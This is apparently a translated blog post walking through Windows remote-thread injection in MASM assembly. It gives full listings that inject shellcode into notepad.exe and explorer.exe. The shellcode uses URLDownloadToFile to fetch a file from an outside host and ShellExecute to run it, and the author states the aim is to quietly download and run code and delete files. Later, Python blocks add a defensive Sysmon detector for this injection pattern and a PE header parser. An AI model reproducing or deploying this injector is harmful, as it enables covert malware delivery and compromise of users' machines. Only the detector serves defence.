Implementation of simple thread Injection

Source: Internet
Author: User

I have recently been implementing thread injection. The process is actually quite simple. The thread injection described in some books is implemented in the form of call [ebx + XXXX], and in that case the invoke pseudo-instruction cannot be used directly. Take calling MessageBox with the pseudo-instruction: normally it would be invoke MessageBox, NULL, addr szCaption, addr szTitle, MB_OK. Once the code is injected remotely it changes and has to be written like this:


lea eax, [ebx + szTitle]
lea ecx, [ebx + szCaption]
_invoke [ebx + _MessageBox], NULL, ecx, eax, MB_OK


That is quite troublesome. After looking at some material online, I instead inject into notepad, the calculator, or any other program whose window class is known, by means of a remote thread. On that basis the injected code can then be replaced with whatever else I need it to do; for example, it is a personal hobby to quietly download and run something and delete a few files.

The following is the main code to run after the notepad process is injected:


Shellcode proc
    push 00403008h
    call LoadLibrary
    push 00403013h
    call LoadLibrary
    invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
    invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
    invoke ExitThread, 0
    ret
Shellcode endp



This code is inserted into notepad to run, so it must itself load the DLLs that its APIs need. For example, URLDownloadToFile lives in urlmon.dll, so that library has to be loaded with LoadLibrary first:

push 00403008h
call LoadLibrary


Here 00403008h is the memory address of the string "urlmon.dll". Within the same exe that address does not change, so we push 00403008h and then call LoadLibrary, after which this API can be used to download the file. ShellExecute is in shell32.dll and is called from the remote thread in the same way:


push 00403013h
call LoadLibrary


Here 00403013h is the memory address of the string "shell32.dll". Once both libraries are loaded, the APIs can be called normally:

invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW



The injection itself uses the invoke pseudo-instruction.
How do we find notepad's process ID? Windows provides FindWindow: if you know notepad's window class, FindWindow returns its window handle, and GetWindowThreadProcessId then gives the process ID. Learning notepad's window class is simple; you only need to download a tool that shows window class names. With that, you can inject into the process space of any program whose window class you know.


szCalss db "Notepad", 0
...
invoke FindWindow, addr szCalss, 0
...



Call GetWindowThreadProcessId to obtain the PID from the window handle. Next, OpenProcess obtains a process handle; the requested access must include "allow remote thread creation" (PROCESS_CREATE_THREAD), "allow operations on the process address space" (PROCESS_VM_OPERATION) and PROCESS_VM_WRITE, because we are going to write into notepad's address space and the rights must be sufficient. If notepad has no memory region in which we can store our code, none of this is of any use, so we release and then allocate memory; VirtualFreeEx and VirtualAllocEx do that. The address returned by VirtualAllocEx is left in eax, and mov hWnd, eax stores it in hWnd as the address to operate on. WriteProcessMemory then writes into that memory, and CreateRemoteThread creates a thread in the target process at the specified start address, which is our injected code.
The complete code is as follows:


.386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include urlmon.inc
include shell32.inc
includelib kernel32.lib
includelib user32.lib
includelib urlmon.lib
includelib shell32.lib

.data
szCalss     db "Notepad", 0
szURL       db "http://chenmingzhong87.xinwen365.com/shell.doc", 0
szSaveFile  db "C:\shell.doc", 0

.data?
hModule     dd ?
hWnd        dd ?
hProcess    dd ?
ShellSize   dd ?
Pid         dd ?
Written     dd ?
dwTid       dd ?

.code
Shellcode proc
    push 00403008h
    call LoadLibrary
    push 00403013h
    call LoadLibrary
    invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
    invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
    invoke ExitThread, 0
    ret
Shellcode endp

start:
    invoke FindWindow, addr szCalss, 0
    invoke GetWindowThreadProcessId, eax, addr Pid
    invoke OpenProcess, PROCESS_CREATE_THREAD or PROCESS_VM_WRITE or \
                        PROCESS_VM_OPERATION, FALSE, Pid
    mov hProcess, eax
    invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE
    invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE, \
                           PAGE_EXECUTE_READWRITE
    mov hWnd, eax
    invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written
    invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid
    invoke ExitProcess, 0
end start
 

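The API sequence in the listing above (OpenProcess with thread-create and VM-write rights, then a thread started in memory that belongs to no loaded module) is also what a defender looks for. The following Python is an added example, not code from the original post: it scans constructed, Sysmon-style ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records; the field names, allowlist and sample values are assumptions made for the example.

```python
PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x0002, 0x0008, 0x0020
# Exactly the rights the injector above asks OpenProcess for (mask 0x2A): enough
# to allocate, write and start a thread in another process.
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
# Constructed allowlist of sources that legitimately open other processes broadly.
TRUSTED_SOURCES = {r"C:\Windows\System32\csrss.exe"}

def has_injection_rights(granted_access):
    """True if a hex GrantedAccess mask contains all three injection rights."""
    return int(granted_access, 16) & INJECTION_RIGHTS == INJECTION_RIGHTS

def flag_event(event):
    """Reason string if the event fits the injection pattern, else None."""
    if event["SourceImage"] in TRUSTED_SOURCES:
        return None
    if event["EventID"] == 10 and has_injection_rights(event["GrantedAccess"]):
        return "opened with create-thread + VM-write rights"
    if event["EventID"] == 8 and not event.get("StartModule"):
        # Thread starts at an address no loaded module covers: the code was
        # copied into VirtualAllocEx'd memory, as the listing above does.
        return "remote thread start not backed by a loaded module"
    return None

def scan(events):
    """(source, target, reason) for every flagged event, in input order."""
    hits = []
    for ev in events:
        reason = flag_event(ev)
        if reason:
            hits.append((ev["SourceImage"], ev["TargetImage"], reason))
    return hits

# Constructed sample events (Sysmon-style fields): an injector opening notepad
# with mask 0x2A and then starting a thread in unbacked memory, a benign remote
# thread that starts inside kernel32.dll, and a trusted source.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\u\inject.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x2A"},
    {"EventID": 8, "SourceImage": r"C:\Users\u\inject.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartAddress": "0x00401000", "StartModule": "", "StartFunction": ""},
    {"EventID": 8, "SourceImage": r"C:\Program Files\Tool\tool.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x7C801D7B",
     "StartModule": r"C:\Windows\System32\kernel32.dll", "StartFunction": "LoadLibraryA"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The two notepad events are flagged; the module-backed thread from tool.exe and the trusted csrss.exe access are not.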
In fact, this section:


Shellcode proc
    push 00403008h
    call LoadLibrary
    push 00403013h
    call LoadLibrary
    invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
    invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
    invoke ExitThread, 0
    ret
Shellcode endp



You can convert it into machine code so that no subroutine is needed: declare it directly as szShellcode db ..., and when writing to the allocated address, write that buffer directly.
Test method:

Open a notepad, run the program to inject it, and then run your writing version.

BUG description:

The same compiled program runs at this point and the test succeeds. If the writing version is opened normally, then, I don't know why, the notepad goes wrong. I am depressed. Please share the trick if you know why.

I simply copied a piece of code from another user, added comments, and put it into my own code. After that it can be used on the explorer.exe process as well. Congratulations:


mov edi, eax
assume edi: ptr IMAGE_DOS_HEADER
add edi, [edi].e_lfanew
add edi, sizeof dword
add edi, sizeof IMAGE_FILE_HEADER
assume edi: ptr IMAGE_OPTIONAL_HEADER32
mov eax, [edi].SizeOfImage      ; save the memory image size of the whole PE
mov ShellSize, eax              ; save it in dwSize for the write
assume edi: nothing


Just a note: this loads the address of the PE file's DOS (MZ) header into edi. sizeof appears to give the size of a type in bytes. The memory image size of the compiled program, SizeOfImage, is then loaded into eax, and mov ShellSize, eax saves SizeOfImage into ShellSize.

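The same header walk as the snippet above, done in Python on raw bytes as an added example (not code from the original post): e_lfanew at DOS-header offset 0x3C, then the 4-byte PE signature and the 20-byte IMAGE_FILE_HEADER, then SizeOfImage at offset 0x38 of IMAGE_OPTIONAL_HEADER32. The build_minimal_pe helper is an assumption of this example; it constructs a header-only blob for testing and is not a loadable executable.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D        # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550     # "PE\0\0"
SIZEOF_IMAGE_FILE_HEADER = 20
OPT_MAGIC_PE32 = 0x10B              # IMAGE_OPTIONAL_HEADER32.Magic
OPT_SIZEOF_IMAGE_OFFSET = 0x38      # SizeOfImage within the 32-bit optional header
SIZEOF_OPTIONAL_HEADER32 = 0xE0


def pe_size_of_image(image):
    """MZ -> e_lfanew -> PE -> IMAGE_FILE_HEADER -> IMAGE_OPTIONAL_HEADER32.SizeOfImage."""
    if len(image) < 0x40 or struct.unpack_from("<H", image, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not a DOS/MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]         # add edi, [edi].e_lfanew
    opt = e_lfanew + 4 + SIZEOF_IMAGE_FILE_HEADER               # skip "PE\0\0" and the file header
    if opt + SIZEOF_OPTIONAL_HEADER32 > len(image):
        raise ValueError("e_lfanew points past the end of the buffer")
    if struct.unpack_from("<I", image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("bad PE signature")
    if struct.unpack_from("<H", image, opt)[0] != OPT_MAGIC_PE32:
        raise ValueError("not a PE32 optional header")
    return struct.unpack_from("<I", image, opt + OPT_SIZEOF_IMAGE_OFFSET)[0]  # mov eax, [edi].SizeOfImage


def build_minimal_pe(size_of_image, e_lfanew=0x80):
    """Constructed test input: a header-only PE32 blob with the given SizeOfImage."""
    opt = e_lfanew + 4 + SIZEOF_IMAGE_FILE_HEADER
    buf = bytearray(opt + SIZEOF_OPTIONAL_HEADER32)
    struct.pack_into("<H", buf, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    struct.pack_into("<I", buf, e_lfanew, IMAGE_NT_SIGNATURE)
    struct.pack_into("<H", buf, opt, OPT_MAGIC_PE32)
    struct.pack_into("<I", buf, opt + OPT_SIZEOF_IMAGE_OFFSET, size_of_image)
    return bytes(buf)


if __name__ == "__main__":
    # Read SizeOfImage from a constructed header; pass a real file's bytes instead to size its image.
    print(hex(pe_size_of_image(build_minimal_pe(0x5000))))
```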
After the modification, the complete code for injecting into explorer.exe follows. The code passes the test on Windows XP SP2:


.386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include urlmon.inc
include shell32.inc
includelib kernel32.lib
includelib user32.lib
includelib urlmon.lib
includelib shell32.lib

.data
szWinClass  db "Progman", 0            ; window class of explorer.exe
szWinTitle  db "Program Manager", 0
szURL       db "http://chenmingzhong87.xinwen365.com/shell.doc", 0
szSaveFile  db "C:\shell.doc", 0

.data?
hModule     dd ?
hWnd        dd ?
hProcess    dd ?
ShellSize   dd ?
Pid         dd ?
Written     dd ?
dwTid       dd ?

.code
Shellcode proc
    push 00403008h
    call LoadLibrary
    push 00403013h
    call LoadLibrary
    invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
    invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
    invoke ExitThread, 0
    ret
Shellcode endp

start:
    ; >>>>>>>>>> the code from here on is borrowed from someone else >>>>>>>>>>
    invoke GetModuleHandle, 0
    mov hModule, eax
    mov edi, eax
    assume edi: ptr IMAGE_DOS_HEADER
    add edi, [edi].e_lfanew
    add edi, sizeof dword
    add edi, sizeof IMAGE_FILE_HEADER
    assume edi: ptr IMAGE_OPTIONAL_HEADER32
    mov eax, [edi].SizeOfImage
    mov ShellSize, eax
    assume edi: nothing
    ; >>>>>>>>>> the original code continues from here >>>>>>>>>>
    invoke FindWindow, addr szWinClass, addr szWinTitle
